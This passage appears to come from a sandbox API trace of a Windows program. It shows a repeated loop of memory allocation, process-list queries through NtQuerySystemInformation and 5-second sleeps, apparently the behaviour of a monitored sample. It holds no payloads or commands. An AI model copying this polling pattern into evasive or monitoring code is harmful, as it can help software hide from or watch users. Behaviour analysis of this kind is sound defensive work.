RegionSize=0xdea54*=0x20000) returned 0x0 [0241.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.662] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.668] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.713] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.727] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.755] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.763] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.770] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.779] 